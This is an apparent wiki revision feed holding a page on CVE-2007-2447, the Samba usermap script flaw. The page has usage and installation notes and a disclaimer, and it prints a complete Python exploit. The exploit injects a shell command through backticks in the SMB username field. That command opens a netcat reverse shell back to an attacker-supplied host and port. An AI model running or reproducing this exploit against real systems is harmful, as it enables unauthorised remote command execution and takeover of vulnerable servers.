<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2007-2447_Samba_3.0.0%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2007-2447 Samba 3.0.0任意命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2007-2447_Samba_3.0.0%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2007-2447_Samba_3.0.0%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-13T17:28:10Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2007-2447_Samba_3.0.0%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=843&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; CVE-2007-2447 ====  CVE-2007-2447 - Samba usermap script. &lt;/br&gt; https://amriunix.com/post/cve-2007-2447-samba-usermap-script/  ## Usage: ```shell $ python userm...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2007-2447_Samba_3.0.0%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=843&amp;oldid=prev"/>
		<updated>2021-04-01T03:23:49Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; CVE-2007-2447 ====  CVE-2007-2447 - Samba usermap script. &amp;lt;/br&amp;gt; https://amriunix.com/post/cve-2007-2447-samba-usermap-script/  ## Usage: ```shell $ python userm...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CVE-2007-2447&lt;br /&gt;
====&lt;br /&gt;
&lt;br /&gt;
CVE-2007-2447 - Samba usermap script.&lt;br /&gt;
&amp;lt;/br&amp;gt;&lt;br /&gt;
https://amriunix.com/post/cve-2007-2447-samba-usermap-script/&lt;br /&gt;
&lt;br /&gt;
## Usage:&lt;br /&gt;
```shell&lt;br /&gt;
$ python usermap_script.py &amp;lt;RHOST&amp;gt; &amp;lt;RPORT&amp;gt; &amp;lt;LHOST&amp;gt; &amp;lt;LPORT&amp;gt;&lt;br /&gt;
```&lt;br /&gt;
  * `RHOST` -- The target address&lt;br /&gt;
  * `RPORT` -- The target port (TCP : 139)&lt;br /&gt;
  * `LHOST` -- The listen address&lt;br /&gt;
  * `LPORT` -- The listen port&lt;br /&gt;
&lt;br /&gt;
## Installation&lt;br /&gt;
&lt;br /&gt;
    sudo apt install python python-pip&lt;br /&gt;
    pip install --user pysmb&lt;br /&gt;
    git clone https://github.com/amriunix/CVE-2007-2447.git&lt;br /&gt;
&lt;br /&gt;
### Disclaimer:&lt;br /&gt;
&lt;br /&gt;
All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==usermap_sctipt.py==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
# -*- coding: utf-8 -*-&lt;br /&gt;
&lt;br /&gt;
# From : https://github.com/amriunix/cve-2007-2447&lt;br /&gt;
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/&lt;br /&gt;
&lt;br /&gt;
import sys&lt;br /&gt;
from smb.SMBConnection import SMBConnection&lt;br /&gt;
&lt;br /&gt;
def exploit(rhost, rport, lhost, lport):&lt;br /&gt;
        payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0&amp;lt;/tmp/hago | /bin/sh &amp;gt;/tmp/hago 2&amp;gt;&amp;amp;1; rm /tmp/hago'&lt;br /&gt;
        username = &amp;quot;/=`nohup &amp;quot; + payload + &amp;quot;`&amp;quot;&lt;br /&gt;
        conn = SMBConnection(username, &amp;quot;&amp;quot;, &amp;quot;&amp;quot;, &amp;quot;&amp;quot;)&lt;br /&gt;
        try:&lt;br /&gt;
            conn.connect(rhost, int(rport), timeout=1)&lt;br /&gt;
        except:&lt;br /&gt;
            print(&amp;quot;[+] Payload was sent - check netcat !&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    print(&amp;quot;[*] CVE-2007-2447 - Samba usermap script&amp;quot;)&lt;br /&gt;
    if len(sys.argv) != 5:&lt;br /&gt;
        print(&amp;quot;[-] usage: python &amp;quot; + sys.argv[0] + &amp;quot; &amp;lt;RHOST&amp;gt; &amp;lt;RPORT&amp;gt; &amp;lt;LHOST&amp;gt; &amp;lt;LPORT&amp;gt;&amp;quot;)&lt;br /&gt;
    else:&lt;br /&gt;
        print(&amp;quot;[+] Connecting !&amp;quot;)&lt;br /&gt;
        rhost = sys.argv[1]&lt;br /&gt;
        rport = sys.argv[2]&lt;br /&gt;
        lhost = sys.argv[3]&lt;br /&gt;
        lport = sys.argv[4]&lt;br /&gt;
        exploit(rhost, rport, lhost, lport)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>